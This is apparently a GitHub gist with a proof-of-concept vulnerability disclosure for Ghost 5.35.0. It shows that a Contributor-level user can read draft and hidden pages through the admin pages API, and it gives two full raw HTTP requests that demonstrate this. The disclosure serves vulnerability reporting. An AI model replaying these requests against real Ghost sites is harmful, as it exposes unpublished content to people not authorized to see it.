Skip to content

Instantly share code, notes, and snippets.

@yurahod

yurahod/PoC.md Secret

Created March 4, 2023 11:58
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save yurahod/2e11eabbe4b92ef1d44b08e37023ecfb to your computer and use it in GitHub Desktop.
Save yurahod/2e11eabbe4b92ef1d44b08e37023ecfb to your computer and use it in GitHub Desktop.
Download ZIP
[Ghost 5.35.0] Broken Access Controls (Blog Pages Disclosure)
Raw
PoC.md

[Ghost 5.35.0] Broken Access Controls

Blog Pages Disclosure

Vulnerable API endpoint: /ghost/api/admin/pages/ The user with the Contributor privileges is able to view created pages including draft or hidden ones.

HTTP Request to get all pages

GET /ghost/api/admin/pages/ HTTP/1.1
Host: [GHOST_HOST]
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-Ghost-Version: 5.25
App-Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json; charset=UTF-8
Referer: http://gege:2368/ghost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ghost-admin-api-session=s%3AMBZT[SNIPPED_COOKIE]oN%2BzIU
Connection: close

HTTP Request to get a specific page

GET /ghost/api/admin/pages/[:pageId] HTTP/1.1
Host: [GHOST_HOST]
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-Ghost-Version: 5.25
App-Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json; charset=UTF-8
Referer: http://gege:2368/ghost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ghost-admin-api-session=s%3AMBZT[SNIPPED_COOKIE]oN%2BzIU
Connection: close
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment